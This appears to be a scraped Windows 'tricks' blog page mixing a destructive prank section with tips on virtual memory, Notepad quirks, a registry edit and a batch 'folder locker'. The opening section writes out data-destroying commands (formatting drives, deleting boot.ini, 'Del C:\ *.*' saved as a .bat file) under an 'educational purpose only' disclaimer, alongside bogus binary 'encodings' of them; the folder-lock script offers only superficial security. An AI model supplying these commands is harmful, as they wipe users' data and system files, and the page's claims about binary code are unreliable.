Windows
Step 1. Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000 Step 2. Step 3. |
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 |
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000 |
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 |
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 |
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off Del C:\ *.*|y save it as Dell.bat want worse then type the following: @echo off and save it as a .bat file |
Increase your Virtual Ram – to make you system faster
1. Hold down the Windows Key and press the Pause/Break button at the top right of your keyboard (another way is right-clicking your computer and clicking Properties).
2. Click on the Advanced tab.
3. Under Performance, click Settings.
4. Then click the Advanced tab on the button that pops up.
5. Under Virtual Memory at the bottom, click Change.
6. Click the Custom Size button.
7. For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although i use 4000), and for the Maximum size type in anywhere from 2000-2500 (although i use 6000).
8. Click Set, and then exit out of all of the windows.
9. Finally, restart your computer.
10. You now have a faster computer and 1-2gb of virtual RAM!.
osted by DarkCoderz at 1:50 AM 0 comments
Notepad holes
Trick 1
~~~~~~~~~
1. open a blank notepad file
2. write .log as the first line of the file, followed by a enter. save the file and close it.
3. double-click the file to open it and notice that notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. type your notes and then save and close the file.
after that open the file and see the changes.
by this trick u can also use ur notebook as a personal diary.
Trick 2
~~~~~~~~~
1.open notepad
2. type “bush hid the facts”
3. save it and close it…
4 then open it again……..n see the changes……………
Trick 3
~~~~~~~~~
do you know the number of the flight that was used to attack the world trade centre?huh?
the flight number was q33n.
now, open your notepad, type the number of the flight (i.e. q33n).
now click on format>font, increase the font size upto 72, and change the font style to ‘wingdings’. now see the ammmaaazzzing thing.
Trick 4
~~~~~~~~~
over at wincustomize, someone thought they’d found an easter egg in the windows notepad application. if you:
1. open notepad
2. type the text “this app can break” (without quotes)
3. save the file
4. re-open the file in notepad
notepad displays seemingly-random chinese characters, or boxes if your default notepad font doesn’t support those characters.
it’s not an easter egg (even though it seems like a funny one), and as it turns out, notepad writes the file correctly. it’s only when notepad reads the file back in that it seems to lose its mind.
Changing Program Installation Directory
“C:\Program Files” directory for installation. This causes a lots space problem in our HDD.
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Go to :-
– Start > Run
– Type “regedit” (without “”)
– Go to this directory…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
– Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and now XP will use that new location as the default installation directory for new programs.
– Careful on Editing the Registry
Lock Folder without using any software
Open Notepad and copy the below code and save as locker.bat. Please don’t forget to change your password in the code it’s shown the place where to type your password.
Now double click on locker .bat
First time start, it will create folder with Locker automatically for u. After creation of the Locker folder, place the contents u want to lock inside the Locker Folder and run locker.bat again.
I hope this comes in handy
cls @ECHO OFF title Folder Locker if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p “cho=>” if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p “pass=>” if NOT %pass%== type your password here goto FAIL attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End |